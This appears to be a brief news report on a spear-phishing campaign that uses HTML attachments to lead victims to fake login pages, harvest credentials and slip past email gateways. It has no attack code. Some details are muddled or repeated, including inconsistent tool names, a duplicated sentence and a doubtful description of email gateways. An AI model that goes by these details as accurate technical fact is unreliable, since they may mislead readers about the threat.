Cybersecurity researchers have discovered a spear-phishing campaign used by the VIP3R group that utilises malicious HTML attachments to attack individuals or organisations.
A recent study spotted the spear-phishing attack that sports a unique chain of DH4 VIP3R L337. The sting also contained about 150 baits for stealing the credentials of more than 150 users owned by security firms and financial services.
Moreover, the attack adopted several HTML attachment payloads aimed at the targeted organisations. If the victims open the malicious emails, they will be redirected to a phishing webpage that impersonates a commonly used service.
This threat campaign takes advantage of its exclusion from the default blocks utilised by the Secure Email Gateways (SEGs). High-end financial firms and banking institutions commonly use these Secure Email Gateways for distributing encrypted emails.
These HTML attachments are developed immediately by a sophisticated payload generator tool. However, the researchers could not confirm the tool kit’s origin, but they are positive the VIP3R_L33T Generator generates it.
The VIP3R generated HTML attachments guide its victims in accessing a phishing page.
If a victim accessed the spoofed phishing pages from the VIP3R HTML attachments, they would be encouraged to fill in the blank username and password section for opening the webpage.
Once the victim provides the credentials, they will be automatically sent to the email address used by the threat actors. The provided credentials are verified and validated on a server-side via the PHPMailer library.
These credentials are then validated and verified on the server-side using the PHPMailer library. If verification fails, an error message is sent back to the user via the browser and redirected to the legitimate equivalent page of the phishing website.
If the victim’s email and password validation is confirmed, the client will be redirected by the website to a PDF file hosted on MS OneDrive.
This newly discovered spear-phishing attack exploits an easy method of validating its target’s credentials. The campaign also can bypass SEG protection. Organisations should inform their employees and train them to spot phishing attacks to stay protected and mitigate the potential damage.
